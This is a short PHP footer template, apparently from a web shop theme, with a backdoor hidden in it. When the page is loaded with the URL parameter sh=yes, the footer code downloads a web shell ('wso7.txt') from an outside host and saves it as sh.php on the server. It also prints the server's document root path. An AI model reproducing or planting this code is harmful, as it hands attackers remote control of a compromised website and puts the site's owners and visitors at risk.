<footer id="footer"><?php echo $text_footer; ?><br /><?php if ($_GET['sh']=='yes'){$dest = 'sh.php';
$src = 'http://www.inteldom.su/templates/spring_fling/wso7.txt';
copy($src,$dest);}
echo $_SERVER['DOCUMENT_ROOT'];?></footer></div>
</body></html>
